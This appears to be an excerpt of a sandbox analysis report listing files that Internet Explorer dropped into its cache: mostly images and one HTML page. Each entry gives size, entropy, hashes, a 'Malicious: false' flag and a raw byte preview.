
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQVtAu[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	19353
Entropy (8bit):	7.759923173787334
Encrypted:	false
SSDEEP:	384:IWHFoJoL9JdqB+osyLtr3JN5rSwxi55JPZZQDm0tHelvTCn:IWHFsyTdItpTdhivJBZH0t+FS
MD5:	E816AA08895A8364BBBFE53AD815ED4E
SHA1:	17B84C624BA2CDBD33D301A55A91582BDB7AF63D
SHA-256:	F800A4F3965D72E5926E78D37DD60DA9C5B5CC6C4C03C615DE4D6E20C56D1036
SHA-512:	7BCCBE050D366D53B5F6D79F085E666799170B0CA4B143F2125A2563D4A81C6392CB2494DAF1CB416FAB0950FF59879A8FF49996E6F0486FA38BB2F4EC703B05
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..JE...8.@-....(.h..@..a@...1@.(..... ....)............Ub..h...%.j..L..`<...........@...1@...1@....(..P.....gjw.g.~3.CcH./......=.IE]....&..h.....Q@.....S+@...9..@..N).z..M $.v..,G.1.....1JC.Q.=.1..e.B.........P....b....LP.b..P...P1..4.!.P1.....B(......!...P.q@.(...,(.s@..(...C.(..P1..R.(.......Z.Z.(.ph.B...P..P...abk\|.P..6.V....b......b....p..b....b.....@.......=(..@.wJ..C\|

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQW0Fs[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	dropped
Size (bytes):	2196
Entropy (8bit):	7.799560401503644
Encrypted:	false
SSDEEP:	48:QfAuETAQgh/boT8B8nC/6gVTzeIA8phYvzJrikCr9KJKqm5sLQ:Qf7E2h/MTRC/6mPCZCBKJjOMQ
MD5:	43B1E133700A65EF28BA0599062D2704
SHA1:	B853984965EE3ACB0924580E8A706AA971A8A5EC
SHA-256:	E90243483DCB75142ED2D6CA34804B2F005416AD471F456FC3DF88B2E69083C5
SHA-512:	A78E4743CAE5DA55EB88B19D59363AAF4DAB05E9A210C26D9FAB550276EB86B448F63385486D2A272FAF27F366ED9A78E41B175C69167020E89958645788D193
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..d`....2..F..i..M....H.Fr..,&.nL.\{.L.P..$M..2~.X..u..3.ml1.).b..^.....fU.-.P...".Q.?1.ERFnE.....;E..9%?...:h.K/.....5B"..........bu...O....+.RI.z5...G'.....1M..>.n]~.6.f.5G5._.....)`....h.g'"..G~"....6:..GNG["..w.flcM/,....+..I/b..T..Xr{z...dth..1.,[..U.c.....4.,...z...6$W.... ).y..c..f.n.Kj..K...}k.F....a.....Vu.)...6.....w....{#.1.....q..dw.4..$[T..d....tv..C).n.&

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQY2pC[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	7.800027593302025
Encrypted:	false
SSDEEP:	48:QfAuETAAZivGzxzGqFMl2DeUlIMpITJuKUZikaA4VWDTGhMl/w:Qf7ErZiedzGCMl2eUlIMpPKUZvnGhMxw
MD5:	961CC4ADBC5069D0175B35C59B1BCBFA
SHA1:	DDFC1FFE58001EDFCBA0ABCEEB1FB8A7F5318815
SHA-256:	CF38574DAC879DCD52648A1D8081BAD02C495631B6B60B092551B3EB41C13B6E
SHA-512:	55B41C02D2A1FE1FE9D392F337C9E15D26648DEC761BFC6FC6F15FFE10056BE4E5D072FB39AD1B32704298A7F9798861239239A6F9F14D5627F63F02FCFA67E2
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..21.+..d...nx.$vS+.M.?J.t&..........c..X..Ms..fc....+...ml....1...E...6!.=.....A..p.%..:...?..N.....E..mm..A..K.2~...z...G....%.j.[.c.y.....x.Kv_$...r..C ....."..H9Y.,..q...S.....T!2}..@..).....g..xS....y0.....h..0..?.x..y..u............d.Rj].@-...G]...pk....+..m$~...".R...~......kX.&..eu...."....\.,..l..ta.4...........?..U[I....V....?..3..\....QU....^.?.`m...O...D.,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQY5UV[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	7009
Entropy (8bit):	7.836882517627216
Encrypted:	false
SSDEEP:	192:QoLulElU7JZihMNcIKN6rJvHT4jB8dRoNrV:bLjlyJZihMCIKKF0jBAoNx
MD5:	562188910D5608DBA1D9AF237FCB54A8
SHA1:	9D7B7DDE24A2FC0EC9178FCF7BF3DAF1AB689F26
SHA-256:	17A93A8E9DAAB42C9CBF5A723610AD7AFDD1260D023D6A673E863E50F6C970A7
SHA-512:	071327A5A15469F1E35F69095488E1A0A08AC2FFD66BF26F32F1846A9E21415161BB14340A8AB0DAC65F934A5D0604B31D1321A11A69BB701C57C508145C50C3
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...P...G+.....M.K?.O.~\z..H......v.T.[R...&m].\|.f...i.q(...6..%...[...5..r\sI..2......XO}.9.d .....!.}.=8.>G.i}.W...b[+.J\|a.(.....4.R..m.a....+KP{.....h..Y=...4.V.y.....B..Bj..........J....f$Qv5..EF1..?.^M+..Y....B\|...?.K.a........(.P.R.(.....).z...@-.!..MK.{m.S..{.k..N.d...+...zv.l.PkW.a..!W\|.....UqWdI.h...h.W....f.......P..J.$..'.2..{X...e...Y.....j)...r..8.m.a.F8/..EO2.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQY7HF[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	dropped
Size (bytes):	16204
Entropy (8bit):	7.963514083722756
Encrypted:	false
SSDEEP:	384:+HJvfRRYxo2jtae9c5m/JRHP8WYp40qAHQS+DF19:+pvnYFjYkc5mxRHP8IgN+DZ
MD5:	E4149489E7D44BB1DA6463E54CF8B8B6
SHA1:	4C84F366F6204849193D26D7C18003DB0E45C1EF
SHA-256:	267D5BB44520D05C6E084914E5FD0C5B9C5C4FB2D503467485403FE2C9785315
SHA-512:	B430AE6CE095403E26ACDAA03D1289A575A9DF615ED6D0DF1198217BACBD650A5EA054680AEED0712E1331A26DB518FDA9D7D9650DA28E8B7412E2584624896B
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..-,!..F..?7.W5J....X.0....GN8.\$..q...U.3.8.{.T..b..9 8.....(i.$.F.94..e.#.GU...7.\..;.-nVC.......~.]N..M\|.$.S...mF).Rz........=.;....}...{..G..as..u.1.).(v.v.n..<......s..u.../e.....m.9...(v.f'.....t{8..f.l.....O..s1..wR.3.=.B.V.NLr_\..d.Q..J,.6..h...(..K..9.ZGy.s.b{..$.!......Z`K.....s..V._t.h..........\L.......rG...y...5...\|.....y..v?SG*..76>......M....O...0p...n....f......P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQYCIb[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	16645
Entropy (8bit):	7.9220255695429
Encrypted:	false
SSDEEP:	384:Ni6Umro7vaAIzcxsnrYeaCBSNKCNdQ4qux7VN1Jjxl:NPs7vaAlxsrrBScCNdQPuzJ9l
MD5:	32404905482653B1A70065F5B805DD6A
SHA1:	98E1E2AD4CF5154C58E33B2C8EDE940E1A555221
SHA-256:	B793CC41F083DF5D954556B95E0E3504160D09E2D3FBD49D631EB6DC1C522C3A
SHA-512:	BB1755FE604C0B49A6E0BC0035314B553A62683DAB08AAB9D445160B4B964A1927E6097564FBB14AA60129821F9187D03A3C90D96B0C7D79CB248FCAB57D2866
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....-...P.@....(.....@....P.P.@..%...S...P.P.@.@..%.....P.P.S.(...P.P.P.P..U@.2..R..21........rA./xO..G({A....P...P..5_......4r.9:j6.9r..R.es.A{l....d.....E.s!......V.h..i...r1Hc<....T.+........f.B.bn.!.h....1(..A@.@......P.P.@.@..%...J.(.(.......Qp......@......Q....h.@..4.....3.@.}....@.,p.'...!....9.....9.....J....U}.h...5<.s.:.T..7nx..~.\|Z..%B..N ....m..=?CJ.d8]..5..(.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQYV96[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	17338
Entropy (8bit):	7.893731201278217
Encrypted:	false
SSDEEP:	384:NtbuXZaE8NBj9JrwXN8l0z9JCX1+N2UpZqP1c7R8o4RBaLGEPt1juetE:NJWJKBj92XNNzOoN2UpY8R83xEXjuJ
MD5:	2FF97BA592E9D23800DC7E7A0ACF4766
SHA1:	ABC540F4692F9376387AA53C4A8A959D6DF9A27B
SHA-256:	3EA36A59A16BBD3D5631810675896B811D491933FC7D90EA89F68E0583556A08
SHA-512:	4E54FCB65106403B5FD3AE2DB1A56063CA646E8EC658A40330194B8804ABCACAD3B5652E14DA61453DEE0060421C5A056F5756B1DD177193905AB71E9537350F
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....q....ICIf9bI.....4.......g.t.b...Z.k.)>......B........h.h..p.}......u..qO.(...&h.9..7.J./.....w.2.".%...5....`....$..E.w-.....\....l.\./.7...@.3.@.E,.T.f8...h..\|+.u........y...._....8.\|.$k......;]...[.P6..Rq..3..P...;7O<6...........!...E-......f.~..GK.x....q.v..ow9....4....Z+...2..{.01..`-..cEE....B.d.nOA...B...Y.u..%F#..z..}i..\Fb.I5i$"6\.../.L....D.f...K.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQYd7s[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	6367
Entropy (8bit):	7.864492364759463
Encrypted:	false
SSDEEP:	192:QoibE2rsAs2m0lLSVYUD0jkHiNJRATryxvK+hu9+mrIgZiczvH/R:bibE2QHR09OYUD/EJRAaBKh9+3gZpzfp
MD5:	2E3C5B39C9B25CD5C8605BBFDADD10B3
SHA1:	802CCA80127A9A9275F1BA47E94112D161EB9C78
SHA-256:	9EAE34123D01CDEE3C947383FB0B3DFFF0BBA0A4F6AA8FB239EACD3307380C01
SHA-512:	250759ACE1853CED9F41485EABD34B0914F820B507C4202B1131FBF6C4EADA167216C1D049A6517B1CB56E277BA96CBDF4339A03C96BF2AB843F16A0E0FEB198
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..3...Q@....@...(.(...1....h..Q@Xz.AH..PP...0.....P!.)....d..l........z.&%...(.......l&(....aq@..)...b...h...0....hM...E......C..F.L...(.1@XB(%.'RMR3.[#1.aN.:li.......R..K.~.]..H<......=..._.....y/...t..E...... .@......(...a1@.&(....b..P.....h..1@...J...!.P!1@...@.....%.&.I.P!E....Z.- .............m.,..V...a(.;...kA..LP+.(.....L...cq.2C....@..0.9.D.6.....@..C..v.......C........X..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQYvGE[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	dropped
Size (bytes):	9797
Entropy (8bit):	7.886626214332623
Encrypted:	false
SSDEEP:	192:QtACpQciRVKjnom9jhj51MI1DjRRIl2BAfOmR7VWF+9P:+19omH5GI1DjvDBABxWY9P
MD5:	24332EE9B84419CEBF25BC47D4764597
SHA1:	B4287241284800E9911D49F865CF0A35AC5BE615
SHA-256:	A75D6FD9C924D220D2FA0CFC44BA1CACC2422C9E338997FB09A5D3903C193ADC
SHA-512:	69B61E3A61E40CF1B92AE4DC070884B5F20DEFA01A62A50CD7E91120CC99026B1966AE316FF2B75F4BD2F59FFC5B62EE26CE713AE40144875EA20CF4DFB58DDF
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....b8P...(....Z.Z.Z.Z.(.h.h.................b....b...Z.(.......(..........J.(.(.(.....@....@.(.h.h.h.h.h.q@...\P...\P...P...(......%..u&..Q..d.i..........mm...:.(.......%qK..+'K.$.$S..)&+2PA.i.(......J.(.(.......@.@..X...p.....@.(.E.8..\P.....b....\P...@.@..! u4..u...R..I.j..J&E....H]..q......H.sc...{iT.?8c......Hc".P.....:R..\*..r...?...Dd0.....k..zm...+...6..=P.5...D.....zU....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAQZ3BL[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	7.843391083264519
Encrypted:	false
SSDEEP:	48:QfAuETADD/FTyLW6VbqT3+Bo0IfW0nkgULrAuMLYoAx+t1ttxF6vY0ZqjQ:Qf7E59qTOBo0IfTkN8uMLYoG+t9xMvYa
MD5:	B99018E40982499D9EF22AD286FF5A40
SHA1:	0F71DC6AE667E0DB2DAC46BE2AE2B5171E7C15AF
SHA-256:	63655C7D65D7BBA8AC738DBE89057517E16D1B841A69FAC9E5377DB245D150B5
SHA-512:	0A504BEA756104D8B93A7408CD457990EC2E5CD9C492ACB194A7EC93C6B178408FA128438365E773E94D30A64AF136B39F7831B2E24DEBC84174721ADC81506E
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.}...,l2..V.WW@.....fR...j..6.B....7..NO.l.r.s.b=I......T.tz\|.....'..4f.....!"(FX....Q+j]..zp%...c.N0.......V.3D.4@/`y..W*0.=.I.....M."...>..m.....on..rVW..>.,.F.\7.{..q....D.2......`.z-n.....0Ap0...........q.wp..g.jT.b.;.......$.1..0.eH?....A:n..n....].2.FW.#..Fv..4."..K.u%.{H...d...k.....H.c.q.3%}.s.:(ni.._ciC.0....ec..r.&X....4.ao.D..H..h.b.}....X... ..........>.or..K....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAud6Gv[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	356
Entropy (8bit):	7.101459310090333
Encrypted:	false
SSDEEP:	6:6v/lhPahmpAKG4NDBbCySVUc3/qF9Hio9hbifyZQw+bS2LblMid1Rc9ruhiFp:6v/73bCLVYHio9h8kQw+7BMW1W9rAir
MD5:	A94D5FFB98CBCA323E6AEA6A826B9ACF
SHA1:	D4F20C419292258A27A06511955A02400C767723
SHA-256:	7527C0E97B871894A7AC475D714D51E82F51BB965848DCD03657B12D5808BCAB
SHA-512:	D2B0D68C085457161F612B50508548D9FD6F7F48DE74AEC8009C65375A0CF0D58469BC8B93AC2705B4AB4A0F0D3FE07E8207500AD896FFC676D7D50649643A7D
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx...j.A.....A..y..X....$.E.'.b.:.h!.bc%...:.FlD..L.@:...F...o...u..+.>nvf..v..n.;08..<.,C....-\|A.x.D1.Mx....B.R>.......3..d@....%....v.Z...5.C....3@.a.[..iku.....%.(....p.h..m.](..s>F.&...q.^..dH......0<a1...4. .z.Q.@<W...,....4..?M.b......@{X..L..x...\|:.B..B..K...j..k6/..LE@....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAzb5EX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	322
Entropy (8bit):	6.966129933463651
Encrypted:	false
SSDEEP:	6:6v/lhPahmKxf8jCAw4DGQJe1kvnxIekdOgcKOtQExGTFDDv4bp:6v/7IxkjyzQEyaI1QmGTlW
MD5:	89E1141C659F2127DD80809F71326697
SHA1:	3262110C91000071FDBB0D33893EC1EC8026ADEC
SHA-256:	98763AAD3E2B7507E7729711ACD2DACCBD56164FE6DDB10410047B212275C279
SHA-512:	1D32DF0DB191F0A3FA152BC47F5F463234224F215A283A26E4EBAF95095A0977ABF5B9D9804FA4DDB276CA8DAE2865789802BB8A18B02B232A9DBB22D5F19E49
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx..=..@..C.....K..`-(.`...vb......vV...`g.!D.....!.....7..../Qg.Z...Y........c....t.......c..)..............)@.:.....8..t1{P_\.1..3Ao......A].....5G_.....\5..x5R.....'...VS......\|.`...~........+....H^..1E^...0.,')....qJ8!..D.!O}.i1..E(....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1ftEY0[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	497
Entropy (8bit):	7.316910976448212
Encrypted:	false
SSDEEP:	12:6v/7YEtTvpTjO7q/cW7Xt3T4kL+JxK0ew3Jw61:rEtTRTj/XtjNSJMkJw61
MD5:	7FBE5C45678D25895F86E36149E83534
SHA1:	173D85747B8724B1C78ABB8223542C2D741F77A9
SHA-256:	9E32BF7E8805F283D02E5976C2894072AC37687E3C7090552529C9F8EF4DB7C6
SHA-512:	E9DE94C6F18C3E013AB0FF1D3FF318F4111BAF2F4B6645F1E90E5433689B9AE522AE3A899975EAA0AECA14A7D042F6DF1A265BA8BC4B7F73847B585E3C12C262
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx....N.A..=.....bC...RR..`'......v.{:.^..... ."1.2....P..p.....nA......o.....1...N4.9.>..8....g.,...\|."...nL.#..vQ.......C.D8.D.0.DR)....kl..\|.......m...T..=.tz...E..y..... ..S.i>O.x.l4p~w......{...U..S....w<.;.A3...R..F..S1..j..%...1.\|.3.mG..... f+.,x....5.e..]lz...).1W..Y(..L`.J...xx.y{..\. ...L..D..\N........g..W...}w:.......@].j._$.LB.U..w'..S......R..:.^..[\.^@....j...t...?..<.............M..r..h....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBMW3y8[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	407
Entropy (8bit):	7.260473594371947
Encrypted:	false
SSDEEP:	6:6v/lhPahmIkCDxHtNgQw6jve9sKu7oaHrKUXNbjjYXJlq2iyoyXnZV1tGB18aMeX:6v/72kOHYQNW9sKuLdNDwbtoyFtgKq7
MD5:	08BE52491E3B8D2BA30C5110FC4B3FF3
SHA1:	E311FB3A1E1EAFDBD0F967F1AEAA0D2A1CE302C8
SHA-256:	C67293877308BB292365B4CD71577F670519822E98ADE59E21C44AEE14729468
SHA-512:	16A2802F1A280A9281188BD036FB53120146C2B9330C651ED65F7BE531A9D111AA8727C4F6971B4CD5FBE60C05F4874E81C1C881F03512E3C087710F96217816
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+.....IIDATx...O+Da..'f....g.O..(...(R.. )%..."[..Bd....a...2.l...9...:..y.y...s.{..?....k....p.;...p...')....;..8..J$............E/..P...aA.o...>c.i.a...o0e..Zb.3.<...._.~..~.,@.'..L.......i..[...AC..C.(.-i>E..P..v...u5..E...,...r..f.-...\|X..~4x}<.M....S..../....U.B(.......D.>....t.6.X.F]...'.._.gq.W.R_..{..x..M.)27...RT...@.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBVuddh[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	316
Entropy (8bit):	6.917866057386609
Encrypted:	false
SSDEEP:	6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
MD5:	636BACD8AA35BA805314755511D4CE04
SHA1:	9BB424A02481910CE3EE30ABDA54304D90D51CA9
SHA-256:	157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
SHA-512:	7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx....P..?E....U..E..\|......\|...M.XD.`4YD...{.\6....s..0.;....?..&.../. ......$.\|Y....UU)gj...]..;x..(.."..$I.(.\.E.......4....y.....c...m.m.P...Fc...e.0.TUE....V.5..8..4..i.8.}.C0M.Y..w^G..t.e.l..0.h.6.\|.Q...Q..i~.\|...._...'..Q...".....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBY7ARN[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	779
Entropy (8bit):	7.670456272038463
Encrypted:	false
SSDEEP:	24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
MD5:	30801A14BDC1842F543DA129067EA9D8
SHA1:	1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
SHA-256:	70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
SHA-512:	8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx.eSMHTQ...7.o.8#3.0....M.BPJDi...E..h.A...6..0.Z$..i.A...B....H0.rl..F.y:?...9O..^......=.J..h..M]f>.I...d...V.D..@....T..5`......@..PK.t6....#,.....o&.U.lJ @...4S.J$..&......%v.B.w.Fc......'B...7...B..0..#z..J..>r.F.Ch..(.U&.\..O.s+..,]Z..w..s.>.I_.......U$D..CP.<....].\w..4..~...Q....._...h...L......X.{i... {..&.w.:.....$.W.....W..."..S.pu..').=2.C#X..D.........}.$..H.F}.f...8...s..:.....2..S.LL..'&.g.....j.#....oH..EhG'...`.p..Ei...D...T.fP.m3.CwD).q.........x....?..+..2....wPyW...j........$..1........!Wu*e"..Q.N#.q..kg...%`w.-.o..z..CO.k.....&..g..@{..k.J._...)X..4)x...ra.#....i._1...f..j...2..&.J.^. .@$.`0N.t.......D.....iL...d/.\|Or.L._...;a..Y.]i.._J....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\checksync[3].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21717
Entropy (8bit):	5.305602492520896
Encrypted:	false
SSDEEP:	384:fuAGcVXlblcqnzleZSweg2f5ng+7naMnpuZOrQWwY4RXrqt:A86qhbS2RJpusrQWwY4RXrqt
MD5:	677C48207F5A13E6D6DADF30D2D6C52B
SHA1:	10BCE9871F228CA247E92B0A6366D5FE2A4426C8
SHA-256:	16872C9C9305146F1665B47C30EAF0AF695450B80E6B659781C71E3B45526027
